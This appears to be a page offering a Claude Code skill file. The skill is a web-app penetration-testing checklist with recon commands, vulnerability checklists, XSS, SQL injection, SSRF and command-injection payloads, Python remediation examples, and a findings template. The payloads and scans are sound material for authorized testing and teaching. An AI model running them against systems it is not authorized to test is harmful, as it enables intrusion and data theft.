
Penetration Testing Checklist

Systematic web application penetration testing methodology. Apply when performing authorized security assessments, bug bounty hunting, or pre-deployment security validation. Covers recon, scanning, exploitation, and reporting.

Install in Claude Code
git clone --depth 1 https://github.com/ThamJiaHe/claude-code-handbook /tmp/penetration-testing-checklist && cp -r /tmp/penetration-testing-checklist/skills/examples/penetration-testing- ~/.claude/skills/penetration-testing-checklist
Then start a new Claude Code session; the skill loads automatically.

penetration-testing-skill.md

# Penetration Testing Checklist

Systematic methodology for authorized web application security testing.

**IMPORTANT:** Only use this skill for authorized security testing — pentesting engagements, bug bounty programs, CTF challenges, or testing your own applications.

## Overview

This skill provides a structured pentest workflow:

1. **Reconnaissance** — Gather information about the target
2. **Scanning** — Identify attack surface and vulnerabilities
3. **Exploitation** — Validate vulnerabilities (with permission)
4. **Post-Exploitation** — Assess impact and lateral movement
5. **Reporting** — Document findings with remediation guidance

## Phase 1: Reconnaissance

### Passive Recon (No direct interaction with target)

```bash
# DNS enumeration
dig +short target.com
dig +short -t MX target.com
dig +short -t TXT target.com

# Subdomain discovery
# Use tools like subfinder, amass, or online services

# Technology fingerprinting (check HTTP headers)
# Note: the curl requests below reach the target's web server and appear in its access logs
curl -sI https://target.com | grep -iE "(server|x-powered|x-frame|content-security)"

# Check robots.txt and sitemap
curl -s https://target.com/robots.txt
curl -s https://target.com/sitemap.xml
```

### Active Recon (Direct interaction)

```bash
# Port scanning (with authorization)
nmap -sV -sC -oN scan_results.txt target.com

# Web technology detection
# Check response headers, JavaScript libraries, CSS frameworks

# Directory enumeration (with authorization)
# Use wordlists to discover hidden paths and files
```

## Phase 2: Vulnerability Scanning

### Authentication Testing

```markdown
## Auth Checklist
- [ ] Test default credentials (admin/admin, admin/password)
- [ ] Test account enumeration via login error messages
- [ ] Test password reset flow for information disclosure
- [ ] Test session fixation
- [ ] Test session timeout and invalidation on logout
- [ ] Test remember-me functionality
- [ ] Test brute force protections
- [ ] Test MFA bypass techniques
- [ ] Test OAuth/OIDC implementation (state, nonce, redirect_uri)
```

### Input Validation Testing

```markdown
## Injection Checklist
- [ ] SQL injection: ' OR 1=1 --, UNION SELECT, blind timing
- [ ] XSS: <script>alert(1)</script>, event handlers, SVG payloads
- [ ] Command injection: ; id, | whoami, $(command)
- [ ] Template injection: {{7*7}}, ${7*7}, #{7*7}
- [ ] Path traversal: ../../../etc/passwd, ....//....//
- [ ] LDAP injection: )(cn=*), *()|(&)
- [ ] XML injection: XXE payloads if XML parsing exists
- [ ] Header injection: CRLF in headers (%0d%0a)
```

### Access Control Testing

```markdown
## Authorization Checklist
- [ ] IDOR: Change resource IDs to access other users' data
- [ ] Forced browsing: Access admin paths as regular user
- [ ] HTTP method tampering: Try PUT/DELETE on read-only endpoints
- [ ] Parameter manipulation: Modify price, role, quantity parameters
- [ ] JWT testing: Algorithm confusion, expired token reuse, claim tampering
- [ ] API key scope: Test keys against endpoints beyond their scope
- [ ] CORS misconfiguration: Test with different Origin headers
```

### Business Logic Testing

```markdown
## Logic Checklist
- [ ] Price manipulation: Modify prices in client-side requests
- [ ] Quantity manipulation: Negative quantities, zero prices
- [ ] Race conditions: Concurrent requests for one-time operations
- [ ] Workflow bypass: Skip steps in multi-step processes
- [ ] Rate limit bypass: Header rotation, IP rotation
- [ ] Feature abuse: Use features in unintended combinations
```

## Phase 3: Common Vulnerability Tests

### XSS Testing Payloads

```
# Basic reflected XSS
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

# Attribute injection
" onfocus="alert(1)" autofocus="
' onfocus='alert(1)' autofocus='

# Filter bypass
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

# DOM-based XSS check points
- URL fragments (#)
- document.location
- document.referrer
- window.name
- postMessage handlers
```
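For the remediation side of these findings, the following added example (not part of the original skill file) runs the payloads listed above through two defenses: a single-pass tag-stripping filter and output encoding. `strip_filter`, `render_text`, `render_input` and `survivors` are hypothetical names chosen for illustration.

```python
import html
import re

# Payloads copied from the list above.
PAYLOADS = [
    "<script>alert(document.domain)</script>",
    "<img src=x onerror=alert(1)>",
    '" onfocus="alert(1)" autofocus="',
    "' onfocus='alert(1)' autofocus='",
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    '<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">',
]

def strip_filter(value: str) -> str:
    """Hypothetical blacklist filter: delete <script> tags in one pass."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)

def render_text(value: str) -> str:
    """Encode for an HTML text node or a quoted attribute value."""
    return html.escape(value, quote=True)

def render_input(value: str, encoder) -> str:
    """Place a value inside a double-quoted attribute, as a search form would."""
    return f'<input name="q" value="{encoder(value)}">'

def survivors(encoder) -> list:
    """Payloads whose output still holds a raw <, " or ' (markup breakout)."""
    return [p for p in PAYLOADS if re.search(r"[<\"']", encoder(p))]

if __name__ == "__main__":
    # Stripping rebuilds the tag it was meant to remove.
    print(strip_filter(PAYLOADS[4]))
    # The attribute payload closes value="..." when only stripping is applied.
    print(render_input(PAYLOADS[2], strip_filter))
    print(render_input(PAYLOADS[2], render_text))
    print(len(survivors(strip_filter)), "survive stripping;",
          len(survivors(render_text)), "survive encoding")
```

`html.escape` covers HTML text and quoted-attribute contexts only; values written into script blocks, URLs or the DOM sinks listed above need encoding for that context.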

### SQL Injection Testing

```
# Error-based detection
' --
' OR '1'='1
' UNION SELECT NULL--

# Blind boolean-based
' AND 1=1--  (true - normal response)
' AND 1=2--  (false - different response)

# Time-based blind
' AND SLEEP(5)--
' AND pg_sleep(5)--

# UNION-based enumeration
' UNION SELECT table_name,NULL FROM information_schema.tables--
```
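To show why the boolean pair above produces different responses, and what the fix looks like in a report's remediation section, here is an added example (not from the original skill file) that runs the same inputs against a concatenated query and a parameterized one. The in-memory SQLite table, the user names and the function names are constructed for illustration.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for an application's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    db.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.test"), ("bob", "bob@example.test")],
    )
    return db

def lookup_concat(db, name: str) -> list:
    """Vulnerable: the input is spliced into the SQL text and parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_param(db, name: str) -> list:
    """Hardened: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in db.execute(sql, (name,))]

def compare(name: str) -> tuple:
    """Return (concatenated result, parameterized result) for one input."""
    db = make_db()
    try:
        concat = lookup_concat(db, name)
    except sqlite3.Error as exc:
        # A database error reaching the client is itself the error-based signal.
        concat = f"error: {type(exc).__name__}"
    return concat, lookup_param(db, name)

if __name__ == "__main__":
    for probe in ("alice", "' OR '1'='1", "alice' AND 1=1--",
                  "alice' AND 1=2--", "' AND SLEEP(5)--"):
        print(repr(probe), "->", compare(probe))
```

With bound parameters every probe is compared as a literal name, so the true/false pair returns the same empty result and there is no differential to observe.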

### SSRF Testing

```
# Internal network access
http://127.0.0.1/
http://localhost/
http://[::1]/
http://0.0.0.0/

# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/  (AWS)
http://metadata.google.internal/  (GCP)
http://169.254.169.254/metadata/  (Azure)

# URL parser confusion
http://127.0.0.1@evil.com
http://evil.com#@127.0.0.1
```
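The check a server-side fetcher needs in order to refuse the destinations above, as an added example (not from the original skill file). `check_url`, `resolve` and the `FAKE_DNS` table are hypothetical; the table is constructed so the example runs offline, with an RFC 5737 documentation address standing in for a public host.

```python
import ipaddress
from urllib.parse import urlsplit

# Ranges behind the payloads above, plus RFC 1918; production lists are longer.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "10.0.0.0/8",
    "172.16.0.0/12", "192.168.0.0/16",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed resolver table (assumption); a real check resolves the name
# itself and then connects to the exact address it validated.
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "metadata.google.internal": ["169.254.169.254"],
    "evil.com": ["203.0.113.10"],
}

def resolve(host: str) -> list:
    """IP literals pass through; names are looked up in FAKE_DNS."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        return [ipaddress.ip_address(a) for a in FAKE_DNS.get(host.lower(), [])]

def check_url(url: str) -> tuple:
    """Return (allowed, reason) for a URL the server is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in authority"
    host = parts.hostname
    if not host:
        return False, "no host"
    addrs = resolve(host)
    if not addrs:
        return False, "host does not resolve"
    for ip in addrs:
        # Normalise IPv4-mapped IPv6 before comparing against the ranges.
        mapped = getattr(ip, "ipv4_mapped", None)
        ip = mapped if mapped is not None else ip
        if any(ip in net for net in BLOCKED_NETS):
            return False, f"{host} resolves to blocked address {ip}"
    return True, f"fetch {host} at {addrs[0]}"
```

For the two parser-confusion URLs, the validator must derive the host with the same parser the HTTP client uses: here `http://127.0.0.1@evil.com` is refused for its userinfo, and `http://evil.com#@127.0.0.1` is treated as a request to `evil.com`.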

## Phase 4: Reporting

### Finding Template

```markdown
## Finding: [Vulnerability Title]

**Severity:** Critical / High / Medium / Low / Informational
**CVSS Score:** X.X
**CWE:** CWE-XXX
**OWASP:** A0X:2025

### Description
[What the vulnerability is and why it matters]

### Steps to Reproduce
1. Navigate to [URL]
2. Enter [payload] in [field]
3. Observe [result]

### Proof of Concept
[Screenshot, HTTP request/response, or code snippet]

### Impact
[What an attacker could do — data access, account takeover, etc.]

### Remediation
[Specific fix with code example]

### References
- [OWASP reference]
- [CWE reference]
```

### Severity Classification

| Severity | Criteria | Examples |
|----------|----------|---------|
| **Critical** | Full system compromise, mass data breach | RCE, SQL injection with admin access, auth bypass |
| **High** | Significant data access or privilege escalation | Stored XSS, IDOR with PII, SSRF to internal services |
| **Medium** | Limited data access or user impact | Reflected XSS, CSRF, information disclosure |
| **Low** | Minimal direct impact | Verbose errors, missing headers, clickjacking |
| **Info** | Best practice recommendations | Outdated TLS, missing HSTS preload |

## Tools Reference

| Category | Tools |
|----------|-------|